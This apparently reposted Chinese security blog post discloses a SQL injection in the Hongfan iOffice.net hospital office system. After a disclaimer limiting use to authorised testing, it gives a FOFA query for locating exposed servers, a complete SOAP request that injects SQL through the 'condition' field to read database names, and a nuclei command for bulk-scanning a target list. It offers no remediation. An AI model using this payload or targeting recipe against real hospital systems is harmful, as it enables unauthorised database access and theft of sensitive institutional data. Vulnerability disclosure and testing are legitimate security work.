0x01 阅读须知
融云安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
0x02 漏洞描述
历经十几年的发展,红帆iOffice.net从最早满足医院行政办公需求(传统OA),到目前融合了卫生主管部门的管理规范和众多行业特色应用,是目前唯一定位于解决医院综合业务管理的软件,是最符合医院行业特点的医院综合业务管理平台,是成功案例最多的医院综合业务管理软件。红帆iOffice.net udfmr.asmx处存在SQL注入漏洞,攻击者可以从其中获取数据库权限。
0x03 漏洞复现
fofa:app="红帆-ioffice"
1.执行POC查询第一个数据库名(MSSQL一般为master),得到第一个数据库信息
POST /iOffice/prg/set/wss/udfmr.asmx HTTP/1.1Host: {{Hostname}}Content-Type: text/xml; charset=utf-8Content-Length: 386SOAPAction: "http://tempuri.org/ioffice/udfmr/GetEmpSearch"<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><GetEmpSearch xmlns="http://tempuri.org/ioffice/udfmr"><condition>1=db_name(1)</condition></GetEmpSearch></soap:Body></soap:Envelope>
2.nuclei验证脚本已发表于知识星球
nuclei.exe -t HongfanOA_udfmr_SQL.yaml -l subs.txt -stats
文章来源: http://mp.weixin.qq.com/s?__biz=MzIxNTIzNTExMQ==&mid=2247489212&idx=1&sn=7aa09faa907c547aefb1361e337c4cd8&chksm=979a39f4a0edb0e234f192ea6858545268b981a844ae292263484f15a096aa5e32755817fee7#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh